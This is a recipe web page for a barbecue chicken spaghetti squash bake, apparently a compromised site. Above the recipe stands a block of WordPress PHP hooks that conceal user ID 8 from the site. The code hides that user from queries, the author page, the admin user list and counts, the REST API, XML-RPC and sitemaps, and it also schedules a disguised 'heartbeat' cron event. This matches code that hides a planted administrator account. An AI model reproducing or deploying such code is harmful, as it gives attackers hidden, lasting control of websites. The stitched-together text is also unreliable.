add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 8;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 8 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 8 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 8;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 8;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 8;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/8(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 8;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
BARBECUE CHICKEN SPAGHETTI SQUASH BAKE - Recipes
Skip to content

This recipe is gluten free, Slimming World and Weight Watchers friendlyExtra Easy – 1 HEa and 1 syn per servingWW Smart Points – 9
INGREDIENTS
- approx 1.5 cups of cooked spaghetti squash (which is approx 1kg/2.25lb raw)
- 400g/14oz of grated potato, squeeze out excess liquid
- 60g/2oz parmesan – 2 HEa’s
- 1 egg
- 1 small red onion, sliced
- half a red pepper, sliced
- half a green pepper, sliced
- 1 cup (approx 150g) of cooked shredded chicken
- 1 cup (240ml) of passata (or crushed tomatoes)
- 4 tbs of barbecue sauce – 4 syns
- 100g (3.5oz) of mozzarella – 2 HEa’s
- salt and black pepper
- spray oil
INSTRUCTIONS
- Preheat oven to 200c/400f (gas mark 6)
- Blot the cooked spaghetti squash with some kitchen paper, just to remove any excess liquid.
- Add the cooked spaghetti squash, grated potato, parmesan and egg to a bowl and mix to combine, season with salt and black pepper.
- Grease a 10 inch quiche/flan dish with spray oil.
- Add the spaghetti squash mixture and flatten evenly.
- Spray over the top with spray oil. Place in the oven and bake for approx 15-20 mins just till lightly golden and set.
- Mix the passata with the barbecue sauce and spread this over the top like you would a pizza.
- Add the onion, peppers and chicken.
- Top with the mozzarella, and place back in the oven and bake until the cheese is melted and golden, approx 15 mins.
- Slice and serve!!
NUTRITION INFORMATION:
YIELD: 4 SERVING SIZE: 1 serving
Amount Per Serving: CALORIES: 360 TOTAL FAT: 12.8g SATURATED FAT: 6.9g CHOLESTEROL: 112mg SODIUM: 868mg CARBOHYDRATES: 33.6g FIBER: 4.9g SUGAR: 10.5g PROTEIN: 28.1g